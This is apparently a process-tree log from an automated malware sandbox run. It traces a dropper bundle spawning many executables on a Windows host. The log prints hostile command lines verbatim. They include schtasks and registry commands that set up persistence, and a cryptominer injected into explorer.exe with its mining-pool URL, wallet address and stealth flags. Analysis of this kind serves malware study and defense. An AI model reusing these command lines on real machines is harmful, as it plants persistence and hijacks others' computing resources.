C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\af0e1ejl.rre\installer.exe /qn CAMPAIGN=654 & exit9⤵PID:3428
-
C:\Users\Admin\AppData\Local\Temp\af0e1ejl.rre\installer.exeC:\Users\Admin\AppData\Local\Temp\af0e1ejl.rre\installer.exe /qn CAMPAIGN=65410⤵PID:1728
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\crqw0yrh.spp\app.exe /8-2222 & exit9⤵PID:2156
-
C:\Users\Admin\AppData\Local\Temp\crqw0yrh.spp\app.exeC:\Users\Admin\AppData\Local\Temp\crqw0yrh.spp\app.exe /8-222210⤵PID:6252
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6252 -s 24011⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1944
-
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu2102ff6cfe07c.exe4⤵PID:1424
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu21568b0ab8.exe4⤵PID:1176
-
C:\Users\Admin\AppData\Local\Temp\7zS4934C2E3\Thu21568b0ab8.exeThu21568b0ab8.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:836 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
- Executes dropped EXE
PID:5376 -
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:5820 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵PID:5288
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
PID:3324
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵
- Suspicious use of SetThreadContext
PID:1772 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵PID:7524
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Suspicious use of SetThreadContext
- Creates scheduled task(s)
PID:6828
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵PID:7956
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵PID:6984
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5892 -
C:\ProgramData\694179.exe"C:\ProgramData\694179.exe"8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4644 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4644 -s 23409⤵
- Program crash
PID:3448
-
-
-
C:\ProgramData\3518457.exe"C:\ProgramData\3518457.exe"8⤵
- Executes dropped EXE
PID:5256
-
-
C:\ProgramData\859642.exe"C:\ProgramData\859642.exe"8⤵
- Executes dropped EXE
PID:4780 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4780 -s 2529⤵
- Program crash
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:1312
-
-
-
C:\ProgramData\841608.exe"C:\ProgramData\841608.exe"8⤵PID:5932
-
-
C:\ProgramData\3792002.exe"C:\ProgramData\3792002.exe"8⤵PID:6132
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6132 -s 25169⤵
- Program crash
- Enumerates system info in registry
PID:5272
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"7⤵PID:6040
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6040 -s 17248⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:5396
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
- Executes dropped EXE
PID:4104 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4104 -s 6048⤵
- Program crash
PID:4720
-
-
-
C:\Users\Admin\AppData\Local\Temp\udptest.exe"C:\Users\Admin\AppData\Local\Temp\udptest.exe"7⤵
- Executes dropped EXE
PID:4580 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4580 -s 3248⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:5940
-
-
-
C:\Users\Admin\AppData\Local\Temp\DVORAK.exe"C:\Users\Admin\AppData\Local\Temp\DVORAK.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5448 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵
- Executes dropped EXE
PID:4892 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\WINsoft\43523.bat" "9⤵PID:6112
-
C:\Users\Admin\AppData\Roaming\WINsoft\HWI.exeHWI.exe10⤵PID:2224
-
C:\Users\Admin\AppData\Roaming\WINsoft\HWI.exeHWI.exe11⤵
- Executes dropped EXE
PID:1652 -
C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"12⤵PID:6068
-
C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"13⤵
- Executes dropped EXE
PID:4160 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe" /F14⤵
- Creates scheduled task(s)
PID:5212
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\e0171c4c73\14⤵PID:6116
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\e0171c4c73\15⤵PID:2068
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\WINsoft\FoxyIDM62s.exeFoxyIDM62s.exe10⤵
- Executes dropped EXE
PID:1920 -
C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp"C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp" -d "C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\"11⤵
- Executes dropped EXE
PID:2160
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"7⤵PID:5564
-
C:\Users\Admin\AppData\Local\Temp\is-H65AV.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-H65AV.tmp\setup_2.tmp" /SL5="$302B2,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5868 -
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT9⤵
- Executes dropped EXE
PID:5472 -
C:\Users\Admin\AppData\Local\Temp\is-IK4K1.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-IK4K1.tmp\setup_2.tmp" /SL5="$202FC,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT10⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:1264 -
C:\Users\Admin\AppData\Local\Temp\is-5PNH3.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-5PNH3.tmp\postback.exe" ss111⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5240
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4540
-
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"7⤵
- Executes dropped EXE
PID:716
-
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe"7⤵PID:5640
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a8⤵PID:1180
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu21df5caa1b78de6.exe /mixone4⤵PID:5084
-
C:\Users\Admin\AppData\Local\Temp\7zS4934C2E3\Thu21df5caa1b78de6.exeThu21df5caa1b78de6.exe /mixone5⤵
- Executes dropped EXE
PID:3800 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3800 -s 2886⤵
- Program crash
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:5440
-
-
-
-
-
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv qZIHR0hrq02NvNbKVX1Y/g.0.21⤵
- Modifies data under HKEY_USERS
PID:3952
-
C:\Users\Admin\AppData\Local\Temp\7zS4934C2E3\Thu2102ff6cfe07c.exeThu2102ff6cfe07c.exe1⤵
- Executes dropped EXE
PID:2320
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 3800 -ip 38001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5204
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1208 -ip 12081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5252
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 912 -ip 9121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5356
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3812 -ip 38121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5368
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Loads dropped DLL
PID:5948
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:5920
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 5948 -ip 59481⤵PID:5144
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 956 -ip 9561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2604
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 600 -p 6040 -ip 60401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5536
-
C:\Users\Admin\AppData\Local\Temp\is-BPRHQ.tmp\stats.tmp"C:\Users\Admin\AppData\Local\Temp\is-BPRHQ.tmp\stats.tmp" /SL5="$402B8,138429,56832,C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:6100
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 4104 -ip 41041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5092
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4580 -ip 45801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5476
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 1696 -ip 16961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6040
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
- Executes dropped EXE
PID:5776
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:4720 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:3060 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3060 -s 4523⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:5680
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 3060 -ip 30601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5988
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 600 -p 5264 -ip 52641⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4532
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4780 -ip 47801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2140
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 488 -p 4644 -ip 46441⤵PID:6124
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 6132 -ip 61321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5920
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:2504
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4720 -ip 47201⤵PID:4596
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:5492 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 2C27146602AD569C57B6A171A5D50C21 C2⤵
- Loads dropped DLL
PID:1472
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 2D1251457488C755F33A08899779B7852⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:3952 -
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
PID:7400
-
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 8179A84A934A9C161806FC396B3EF115 E Global\MSI00002⤵PID:6968
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 1010A43E70E60704E768AF57F740065E C2⤵PID:8364
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 5E3236CFBD81DE8BEB57ED98CF345C8B2⤵
- Blocklisted process makes network request
PID:1864
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"2⤵
- Adds Run key to start application
PID:6912 -
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default3⤵
- Adds Run key to start application
PID:2776 -
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"4⤵PID:6832
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exeC:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x20c,0x210,0x214,0x1e8,0x218,0x7ffd4947dec0,0x7ffd4947ded0,0x7ffd4947dee05⤵PID:6120
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exeC:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ff6edb49e70,0x7ff6edb49e80,0x7ff6edb49e906⤵PID:8684
-
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1568,8753628799168462511,961445062895965673,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6832_2007217320" --mojo-platform-channel-handle=1856 /prefetch:85⤵PID:4700
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1568,8753628799168462511,961445062895965673,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6832_2007217320" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1572 /prefetch:25⤵PID:4496
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1568,8753628799168462511,961445062895965673,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6832_2007217320" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2492 /prefetch:15⤵PID:8788
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1568,8753628799168462511,961445062895965673,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6832_2007217320" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2480 /prefetch:15⤵PID:6116
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1568,8753628799168462511,961445062895965673,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6832_2007217320" --mojo-platform-channel-handle=2372 /prefetch:85⤵PID:7164
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1568,8753628799168462511,961445062895965673,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6832_2007217320" --mojo-platform-channel-handle=3232 /prefetch:85⤵PID:6764
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1568,8753628799168462511,961445062895965673,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6832_2007217320" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3304 /prefetch:25⤵
- Modifies registry class
PID:2912
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1568,8753628799168462511,961445062895965673,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6832_2007217320" --mojo-platform-channel-handle=3272 /prefetch:85⤵PID:7328
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1568,8753628799168462511,961445062895965673,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6832_2007217320" --mojo-platform-channel-handle=2616 /prefetch:85⤵PID:7096
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1568,8753628799168462511,961445062895965673,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6832_2007217320" --mojo-platform-channel-handle=2176 /prefetch:85⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6332
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1568,8753628799168462511,961445062895965673,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6832_2007217320" --mojo-platform-channel-handle=1584 /prefetch:85⤵PID:2472
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_42FD.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"3⤵PID:8272
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:3224 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:4944 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4944 -s 2043⤵
- Program crash
PID:3156
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 4944 -ip 49441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5608
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 5744 -ip 57441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:888
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:5324
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
- Modifies data under HKEY_USERS
PID:6196
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 584 -ip 5841⤵PID:6492
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:6604
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 584 -p 3092 -ip 30921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7112
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 7040 -ip 70401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Enumerates system info in registry
PID:6732
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 7172 -ip 71721⤵PID:6332
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 1728 -ip 17281⤵PID:6852
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 6804 -ip 68041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3196
-
